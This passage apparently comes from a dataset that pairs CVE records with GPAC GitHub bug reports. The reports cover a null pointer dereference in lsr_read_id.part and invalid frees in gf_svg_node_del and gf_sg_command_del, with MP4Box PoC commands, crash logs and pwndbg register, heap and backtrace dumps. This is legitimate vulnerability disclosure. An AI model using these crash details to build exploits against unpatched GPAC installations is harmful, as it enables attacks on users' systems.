──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────00:0000│ rsp 0x7fffffff6e18 —▸ 0x7ffff7b51c85 (lsr_read_id+629) ◂— mov qword ptr [r15 + 8], 0 01:0008│ 0x7fffffff6e20 —▸ 0x5555555e37b0 —▸ 0x5555555e37d0 ◂— 0x8000000300000426 02:0010│ 0x7fffffff6e28 ◂— 0x426 03:0018│ 0x7fffffff6e30 —▸ 0x5555555e37b0 —▸ 0x5555555e37d0 ◂— 0x8000000300000426 04:0020│ 0x7fffffff6e38 —▸ 0x7ffff784a61e (gf_node_setup+30) ◂— mov qword ptr [rbx], rax 05:0028│ 0x7fffffff6e40 ◂— 0x426 ... ↓ 2 skipped ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff75d9850 free f 1 0x7ffff7b51c85 lsr_read_id+629 f 2 0x7ffff7b5e91b lsr_read_path+283 f 3 0x7ffff7b61822 lsr_read_update_content_model+770 f 4 0x7ffff7b59fc3 lsr_read_command_list+6819 f 5 0x7ffff7b5ab74 lsr_decode_laser_unit+708 f 6 0x7ffff7b6239d gf_laser_decode_command_list+333 f 7 0x7ffff7aa3061 gf_sm_load_run_isom+1505 ──────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> bin tcachebins 0x20 [ 1]: 0x5555555e1690 ◂— 0x0 0x50 [ 1]: 0x5555555e2ad0 ◂— 0x0 0xb0 [ 1]: 0x5555555dc540 ◂— 0x0 0xc0 [ 4]: 0x5555555d1d20 —▸ 0x5555555d2060 —▸ 0x5555555d2270 —▸ 0x5555555dc3c0 ◂— 0x0 0x140 [ 1]: 0x5555555d1b80 ◂— 0x0 0x1c0 [ 1]: 0x5555555d17a0 ◂— 0x0 0x210 [ 1]: 0x5555555dd8b0 ◂— 0x0 0x410 [ 1]: 0x5555555cee30 ◂— 0x0 fastbins 0x20: 0x0 0x30: 0x0 0x40: 0x0 0x50: 0x0 0x60: 0x0 0x70: 0x0 0x80: 0x0 unsortedbin all: 0x0 smallbins empty largebins empty pwndbg> c Continuing. double free or corruption (out) pwndbg> x/10gx 0x5555555e06f0-0x20 0x5555555e06d0: 0x0000000000000000 0x0000000000000061 0x5555555e06e0: 0x00005555555e0698 0x00007fffffff6a50 0x5555555e06f0: 0x00005555555e2758 0x00005555555e2758 0x5555555e0700: 0x0000000000000000 0x0000000000000000 0x5555555e0710: 0x0000000000000000 0x0000000000000000 ```

Invalid free in gf_svg_node_del()

https://api.github.com/repos/gpac/gpac/issues/1986/comments

2021-12-14T02:57:15Z

2021-12-14T10:38:08Z

https://github.com/gpac/gpac/issues/1986

CVE-2021-45260

2021-12-22T18:15:08.060

A null pointer dereference vulnerability exists in gpac 1.1.0 in the lsr_read_id.part function, which causes a segmentation fault and application crash.

https://github.com/gpac/gpac/issues/1979

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A null pointer dereference was discovered in lsr_read_id.part(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -bt poc_15 ./MP4Box -bt poc_16 ./MP4Box -bt poc_18 ``` [poc.zip](https://github.com/gpac/gpac/files/7696725/poc.zip) **Result** poc_15 ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 852201 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 852201 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing [LASeR] samepolyXXX coded in bitstream but no polyXXX defined ! [LASeR] samepolyXXX coded in bitstream but no polyXXX defined ! [LASeR] samepolyXXX coded in bitstream but no polyXXX defined ! [LASeR] samerect coded in bitstream but no rect defined ! [LASeR] samerect coded in bitstream but no rect defined ! [1] 1501387 segmentation fault ./MP4Box -bt ./poc/poc_15 ``` poc_16 ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 861267 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 861267 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing [1] 2404995 segmentation fault ./MP4Box -bt ./poc/poc_16 ``` poc_18 ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 861267 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 861267 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing [1] 1048981 segmentation fault ./MP4Box -bt ./poc/poc_18 ``` **gdb** poc_15 ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7b508f8 in lsr_read_id.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────[ REGISTERS ]──────────────────────────────── RAX 0x770000007c RBX 0x0 RCX 0x5555555e5760 ◂— 0x8b374bf60d8b0d94 RDX 0x0 RDI 0x5555555deda0 —▸ 0x5555555e4e20 —▸ 0x7fffffff69c0 ◂— 0x5b0000006e /* 'n' */ RSI 0x0 R8 0x5555555e5740 —▸ 0x5555555e4730 —▸ 0x5555555e5530 ◂— 0x0 R9 0x5555555e5a10 ◂— 0x2b0 R10 0x5555555c6010 ◂— 0x0 R11 0x7ffff7727be0 (main_arena+96) —▸ 0x5555555e5af0 ◂— 0x3529 /* ')5' */ R12 0x7fffffff69c0 ◂— 0x5b0000006e /* 'n' */ R13 0x3 R14 0xe R15 0x0 RBP 0x5555555dcf10 —▸ 0x5555555d2750 ◂— 0x0 RSP 0x7fffffff68a0 —▸ 0x5555555e56e0 —▸ 0x5555555e5700 ◂— 0x800000030000042b RIP 0x7ffff7b508f8 (lsr_read_id.part+232) ◂— cmp byte ptr [rax], 0x23 ───────────────────────────────────────[ DISASM ]──────────────────────────────────────── ► 0x7ffff7b508f8 <lsr_read_id.part+232> cmp byte ptr [rax], 0x23 0x7ffff7b508fb <lsr_read_id.part+235> sete dl 0x7ffff7b508fe <lsr_read_id.part+238> xor esi, esi 0x7ffff7b50900 <lsr_read_id.part+240> lea rdi, [rax + rdx + 1] 0x7ffff7b50905 <lsr_read_id.part+245> mov edx, 0xa 0x7ffff7b5090a <lsr_read_id.part+250> call strtol@plt <strtol@plt> 0x7ffff7b5090f <lsr_read_id.part+255> cmp r14d, eax 0x7ffff7b50912 <lsr_read_id.part+258> je lsr_read_id.part+608 <lsr_read_id.part+608> 0x7ffff7b50918 <lsr_read_id.part+264> add r15d, 1 0x7ffff7b5091c <lsr_read_id.part+268> cmp r15d, r13d 0x7ffff7b5091f <lsr_read_id.part+271> jb lsr_read_id.part+208 <lsr_read_id.part+208> ────────────────────────────────────────[ STACK ]──────────────────────────────────────── 00:0000│ rsp 0x7fffffff68a0 —▸ 0x5555555e56e0 —▸ 0x5555555e5700 ◂— 0x800000030000042b ... ↓ 2 skipped 03:0018│ 0x7fffffff68b8 —▸ 0x7ffff784961e (gf_node_setup+30) ◂— mov qword ptr [rbx], rax 04:0020│ 0x7fffffff68c0 ◂— 0x42b ... ↓ 2 skipped 07:0038│ 0x7fffffff68d8 ◂— 0xaaefd0fae3bbeb00 ──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────── ► f 0 0x7ffff7b508f8 lsr_read_id.part+232 f 1 0x7ffff7b5e4bb lsr_read_rect+139 f 2 0x7ffff7b5a965 lsr_read_scene_content_model+661 f 3 0x7ffff7b5b62c lsr_read_group_content.part+316 f 4 0x7ffff7b5f0fc lsr_read_data+108 f 5 0x7ffff7b5ab3d lsr_read_scene_content_model+1133 f 6 0x7ffff7b5b62c lsr_read_group_content.part+316 f 7 0x7ffff7b5e536 lsr_read_rect+262 ───────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff7b508f8 in lsr_read_id.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #1 0x00007ffff7b5e4bb in lsr_read_rect () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff7b5a965 in lsr_read_scene_content_model () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff7b5b62c in lsr_read_group_content.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x00007ffff7b5f0fc in lsr_read_data () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #5 0x00007ffff7b5ab3d in lsr_read_scene_content_model () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #6 0x00007ffff7b5b62c in lsr_read_group_content.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #7 0x00007ffff7b5e536 in lsr_read_rect () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #8 0x00007ffff7b5a965 in lsr_read_scene_content_model () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #9 0x00007ffff7b5b62c in lsr_read_group_content.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #10 0x00007ffff7b5cea8 in lsr_read_audio.isra () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #11 0x00007ffff7b5ac18 in lsr_read_scene_content_model () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #12 0x00007ffff7b5b62c in lsr_read_group_content.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #13 0x00007ffff7b60795 in lsr_read_svg () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #14 0x00007ffff7b575c7 in lsr_read_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #15 0x00007ffff7b59914 in lsr_decode_laser_unit () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #16 0x00007ffff7b6204d in gf_laser_decode_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #17 0x00007ffff7aa1eb1 in gf_sm_load_run_isom () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #18 0x00005555555844a8 in dump_isom_scene () #19 0x000055555557b42c in mp4boxMain () #20 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe208) at ../csu/libc-start.c:308 #21 0x000055555556c45e in _start () ``` poc_16 ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7b508f8 in lsr_read_id.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────[ REGISTERS ]──────────────────────────────── RAX 0x0 RBX 0x0 RCX 0x0 RDX 0x0 RDI 0x5555555de970 —▸ 0x5555555dee00 —▸ 0x5555555dedb0 ◂— 0x0 RSI 0x1 R8 0x1999999999999999 R9 0x0 R10 0x7ffff76daac0 (_nl_C_LC_CTYPE_toupper+512) ◂— 0x100000000 R11 0x7ffff76db3c0 (_nl_C_LC_CTYPE_class+256) ◂— 0x2000200020002 R12 0x5555555dee88 ◂— 0x0 R13 0x2 R14 0x2 R15 0x1 RBP 0x5555555dcc30 —▸ 0x5555555d26d0 ◂— 0x0 RSP 0x7fffffff6d40 —▸ 0x5555555df280 —▸ 0x5555555df2a0 ◂— 0x800000030000041a RIP 0x7ffff7b508f8 (lsr_read_id.part+232) ◂— cmp byte ptr [rax], 0x23 ───────────────────────────────────────[ DISASM ]──────────────────────────────────────── ► 0x7ffff7b508f8 <lsr_read_id.part+232> cmp byte ptr [rax], 0x23 0x7ffff7b508fb <lsr_read_id.part+235> sete dl 0x7ffff7b508fe <lsr_read_id.part+238> xor esi, esi 0x7ffff7b50900 <lsr_read_id.part+240> lea rdi, [rax + rdx + 1] 0x7ffff7b50905 <lsr_read_id.part+245> mov edx, 0xa 0x7ffff7b5090a <lsr_read_id.part+250> call strtol@plt <strtol@plt> 0x7ffff7b5090f <lsr_read_id.part+255> cmp r14d, eax 0x7ffff7b50912 <lsr_read_id.part+258> je lsr_read_id.part+608 <lsr_read_id.part+608> 0x7ffff7b50918 <lsr_read_id.part+264> add r15d, 1 0x7ffff7b5091c <lsr_read_id.part+268> cmp r15d, r13d 0x7ffff7b5091f <lsr_read_id.part+271> jb lsr_read_id.part+208 <lsr_read_id.part+208> ────────────────────────────────────────[ STACK ]──────────────────────────────────────── 00:0000│ rsp 0x7fffffff6d40 —▸ 0x5555555df280 —▸ 0x5555555df2a0 ◂— 0x800000030000041a ... ↓ 2 skipped 03:0018│ 0x7fffffff6d58 —▸ 0x7ffff784961e (gf_node_setup+30) ◂— mov qword ptr [rbx], rax 04:0020│ 0x7fffffff6d60 ◂— 0x41a ... ↓ 2 skipped 07:0038│ 0x7fffffff6d78 ◂— 0x5c21095cb581c200 ──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────── ► f 0 0x7ffff7b508f8 lsr_read_id.part+232 f 1 0x7ffff7b55c63 lsr_read_foreignObject+99 f 2 0x7ffff7b5abb0 lsr_read_scene_content_model+1248 f 3 0x7ffff7b5b62c lsr_read_group_content.part+316 f 4 0x7ffff7b60795 lsr_read_svg+885 f 5 0x7ffff7b575c7 lsr_read_command_list+759 f 6 0x7ffff7b59914 lsr_decode_laser_unit+708 f 7 0x7ffff7b6204d gf_laser_decode_command_list+333 ───────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff7b508f8 in lsr_read_id.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #1 0x00007ffff7b55c63 in lsr_read_foreignObject () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff7b5abb0 in lsr_read_scene_content_model () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff7b5b62c in lsr_read_group_content.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x00007ffff7b60795 in lsr_read_svg () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #5 0x00007ffff7b575c7 in lsr_read_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #6 0x00007ffff7b59914 in lsr_decode_laser_unit () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #7 0x00007ffff7b6204d in gf_laser_decode_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #8 0x00007ffff7aa1eb1 in gf_sm_load_run_isom () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #9 0x00005555555844a8 in dump_isom_scene () #10 0x000055555557b42c in mp4boxMain () #11 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe208) at ../csu/libc-start.c:308 #12 0x000055555556c45e in _start () ``` poc_18 ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7b508f8 in lsr_read_id.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────[ REGISTERS ]──────────────────────────────── RAX 0x0 RBX 0x0 RCX 0x0 RDX 0x0 RDI 0x5555555de970 —▸ 0x5555555dee00 —▸ 0x5555555dedb0 ◂— 0x0 RSI 0x1 R8 0x1999999999999999 R9 0x0 R10 0x7ffff76daac0 (_nl_C_LC_CTYPE_toupper+512) ◂— 0x100000000 R11 0x7ffff76db3c0 (_nl_C_LC_CTYPE_class+256) ◂— 0x2000200020002 R12 0x5555555dee88 ◂— 0x0 R13 0x2 R14 0x4 R15 0x1 RBP 0x5555555dcc30 —▸ 0x5555555d26d0 ◂— 0x0 RSP 0x7fffffff6d80 —▸ 0x5555555df1f0 —▸ 0x5555555df210 ◂— 0x8000000300000415 RIP 0x7ffff7b508f8 (lsr_read_id.part+232) ◂— cmp byte ptr [rax], 0x23 ───────────────────────────────────────[ DISASM ]──────────────────────────────────────── ► 0x7ffff7b508f8 <lsr_read_id.part+232> cmp byte ptr [rax], 0x23 0x7ffff7b508fb <lsr_read_id.part+235> sete dl 0x7ffff7b508fe <lsr_read_id.part+238> xor esi, esi 0x7ffff7b50900 <lsr_read_id.part+240> lea rdi, [rax + rdx + 1] 0x7ffff7b50905 <lsr_read_id.part+245> mov edx, 0xa 0x7ffff7b5090a <lsr_read_id.part+250> call strtol@plt <strtol@plt> 0x7ffff7b5090f <lsr_read_id.part+255> cmp r14d, eax 0x7ffff7b50912 <lsr_read_id.part+258> je lsr_read_id.part+608 <lsr_read_id.part+608> 0x7ffff7b50918 <lsr_read_id.part+264> add r15d, 1 0x7ffff7b5091c <lsr_read_id.part+268> cmp r15d, r13d 0x7ffff7b5091f <lsr_read_id.part+271> jb lsr_read_id.part+208 <lsr_read_id.part+208> ────────────────────────────────────────[ STACK ]──────────────────────────────────────── 00:0000│ rsp 0x7fffffff6d80 —▸ 0x5555555df1f0 —▸ 0x5555555df210 ◂— 0x8000000300000415 ... ↓ 2 skipped 03:0018│ 0x7fffffff6d98 —▸ 0x7ffff784961e (gf_node_setup+30) ◂— mov qword ptr [rbx], rax 04:0020│ 0x7fffffff6da0 ◂— 0x415 ... ↓ 2 skipped 07:0038│ 0x7fffffff6db8 ◂— 0x812c333cc038400 ──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────── ► f 0 0x7ffff7b508f8 lsr_read_id.part+232 f 1 0x7ffff7b5d22e lsr_read_ellipse+78 f 2 0x7ffff7b5abc8 lsr_read_scene_content_model+1272 f 3 0x7ffff7b5b62c lsr_read_group_content.part+316 f 4 0x7ffff7b60795 lsr_read_svg+885 f 5 0x7ffff7b575c7 lsr_read_command_list+759 f 6 0x7ffff7b59914 lsr_decode_laser_unit+708 f 7 0x7ffff7b6204d gf_laser_decode_command_list+333 ───────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff7b508f8 in lsr_read_id.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #1 0x00007ffff7b5d22e in lsr_read_ellipse () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff7b5abc8 in lsr_read_scene_content_model () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff7b5b62c in lsr_read_group_content.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x00007ffff7b60795 in lsr_read_svg () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #5 0x00007ffff7b575c7 in lsr_read_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #6 0x00007ffff7b59914 in lsr_decode_laser_unit () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #7 0x00007ffff7b6204d in gf_laser_decode_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #8 0x00007ffff7aa1eb1 in gf_sm_load_run_isom () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #9 0x00005555555844a8 in dump_isom_scene () #10 0x000055555557b42c in mp4boxMain () #11 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe208) at ../csu/libc-start.c:308 #12 0x000055555556c45e in _start () ```

Null Pointer Dereference in lsr_read_id.part()

https://api.github.com/repos/gpac/gpac/issues/1979/comments

2021-12-11T09:14:24Z

2021-12-13T13:22:41Z

https://github.com/gpac/gpac/issues/1979

CVE-2021-45262

2021-12-22T18:15:08.140

An invalid free vulnerability exists in gpac 1.1.0 via the gf_sg_command_del function, which causes a segmentation fault and application crash.

https://github.com/gpac/gpac/issues/1980

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ An invalid free was discovered in gf_sg_command_del(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -bt ./poc/poc_17 ``` [poc_17.zip](https://github.com/gpac/gpac/files/7696726/poc_17.zip) **Result** ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Unknown box type prl in parent dref [iso file] Incomplete box mdat - start 11495 size 860323 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Unknown box type prl in parent dref [iso file] Incomplete box mdat - start 11495 size 860323 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [MP4 Loading] decoding sample 1 from track ID 8 failed free(): invalid pointer [1] 3334251 abort ./MP4Box -bt ./poc/poc_17 ``` **gdb** ``` free(): invalid pointer Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────[ REGISTERS ]──────────────────────────────── RAX 0x0 RBX 0x7ffff72bf040 ◂— 0x7ffff72bf040 RCX 0x7ffff758218b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108] RDX 0x0 RDI 0x2 RSI 0x7fffffff6f20 ◂— 0x0 R8 0x0 R9 0x7fffffff6f20 ◂— 0x0 R10 0x8 R11 0x246 R12 0x7fffffff7190 ◂— 0x0 R13 0x10 R14 0x7ffff7ffb000 ◂— 0x6565726600001000 R15 0x1 RBP 0x7fffffff7270 —▸ 0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0 RSP 0x7fffffff6f20 ◂— 0x0 RIP 0x7ffff758218b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108] ───────────────────────────────────────[ DISASM ]──────────────────────────────────────── ► 0x7ffff758218b <raise+203> mov rax, qword ptr [rsp + 0x108] 0x7ffff7582193 <raise+211> xor rax, qword ptr fs:[0x28] 0x7ffff758219c <raise+220> jne raise+260 <raise+260> ↓ 0x7ffff75821c4 <raise+260> call __stack_chk_fail <__stack_chk_fail> 0x7ffff75821c9 nop dword ptr [rax] 0x7ffff75821d0 <killpg> endbr64 0x7ffff75821d4 <killpg+4> test edi, edi 0x7ffff75821d6 <killpg+6> js killpg+16 <killpg+16> 0x7ffff75821d8 <killpg+8> neg edi 0x7ffff75821da <killpg+10> jmp kill <kill> 0x7ffff75821df <killpg+15> nop ────────────────────────────────────────[ STACK ]──────────────────────────────────────── 00:0000│ rsi r9 rsp 0x7fffffff6f20 ◂— 0x0 01:0008│ 0x7fffffff6f28 —▸ 0x7ffff77534c8 ◂— 0xe001200003748 /* 'H7' */ 02:0010│ 0x7fffffff6f30 —▸ 0x7fffffff72f0 —▸ 0x5555555d47a0 —▸ 0x5555555d4370 ◂— 0x0 03:0018│ 0x7fffffff6f38 —▸ 0x7ffff7fe7c2e ◂— mov r11, rax 04:0020│ 0x7fffffff6f40 ◂— 0x0 05:0028│ 0x7fffffff6f48 ◂— 0x0 06:0030│ 0x7fffffff6f50 —▸ 0x5555555df390 —▸ 0x5555555df3f0 —▸ 0x5555555df0f0 ◂— 0x0 07:0038│ 0x7fffffff6f58 ◂— 0x0 ──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────── ► f 0 0x7ffff758218b raise+203 f 1 0x7ffff7561859 abort+299 f 2 0x7ffff75cc3ee __libc_message+670 f 3 0x7ffff75d447c f 4 0x7ffff75d5cac _int_free+748 f 5 0x7ffff784f461 gf_sg_command_del+353 f 6 0x7ffff7a88203 gf_sm_del+195 f 7 0x555555584423 dump_isom_scene+627 ───────────────────────────────────────────────────────────────────────────────────────── ``` `break gf_svg_delete_attribute_value` ``` pwndbg> 0x00007ffff784f45c in gf_sg_command_del () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────[ REGISTERS ]──────────────────────────────── RAX 0x0 RBX 0x0 RCX 0x5555555df310 ◂— 0x0 *RDX 0x5555555d4370 ◂— 0x0 RDI 0x0 RSI 0x5555555df300 ◂— 0x0 R8 0x2 R9 0xfffffff6 R10 0x7ffff775ba72 ◂— 'gf_node_unregister_children' R11 0x7ffff784a6d0 (gf_node_unregister_children) ◂— endbr64 R12 0x5555555df2e0 ◂— 0x0 R13 0x5555555d47a0 —▸ 0x5555555d4370 ◂— 0x0 R14 0x5555555d4370 ◂— 0x0 R15 0x0 RBP 0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0 RSP 0x7fffffff7310 ◂— 0x1 *RIP 0x7ffff784f45c (gf_sg_command_del+348) ◂— call 0x7ffff78c7fb0 ───────────────────────────────────────[ DISASM ]──────────────────────────────────────── 0x7ffff784f449 <gf_sg_command_del+329> mov rsi, qword ptr [r12 + 8] 0x7ffff784f44e <gf_sg_command_del+334> test rsi, rsi 0x7ffff784f451 <gf_sg_command_del+337> je gf_sg_command_del+255 <gf_sg_command_del+255> 0x7ffff784f453 <gf_sg_command_del+339> mov edi, dword ptr [r12 + 4] 0x7ffff784f458 <gf_sg_command_del+344> mov rdx, qword ptr [rbp] ► 0x7ffff784f45c <gf_sg_command_del+348> call gf_svg_delete_attribute_value <gf_svg_delete_attribute_value> rdi: 0x0 rsi: 0x5555555df300 ◂— 0x0 rdx: 0x5555555d4370 ◂— 0x0 rcx: 0x5555555df310 ◂— 0x0 0x7ffff784f461 <gf_sg_command_del+353> jmp gf_sg_command_del+255 <gf_sg_command_del+255> 0x7ffff784f463 <gf_sg_command_del+355> nop dword ptr [rax + rax] 0x7ffff784f468 <gf_sg_command_del+360> mov rdi, qword ptr [r12 + 8] 0x7ffff784f46d <gf_sg_command_del+365> test rdi, rdi 0x7ffff784f470 <gf_sg_command_del+368> je gf_sg_command_del+384 <gf_sg_command_del+384> ────────────────────────────────────────[ STACK ]──────────────────────────────────────── 00:0000│ rsp 0x7fffffff7310 ◂— 0x1 01:0008│ 0x7fffffff7318 ◂— 0x5cf4ff747866de00 02:0010│ 0x7fffffff7320 —▸ 0x7fffffff7340 —▸ 0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0 03:0018│ 0x7fffffff7328 —▸ 0x5555555defe0 ◂— 0x8 04:0020│ 0x7fffffff7330 —▸ 0x5555555df130 ◂— 0x0 05:0028│ 0x7fffffff7338 —▸ 0x7ffff7a88203 (gf_sm_del+195) ◂— jmp 0x7ffff7a881c8 06:0030│ 0x7fffffff7340 —▸ 0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0 07:0038│ 0x7fffffff7348 ◂— 0x5cf4ff747866de00 ──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────── ► f 0 0x7ffff784f45c gf_sg_command_del+348 f 1 0x7ffff7a88203 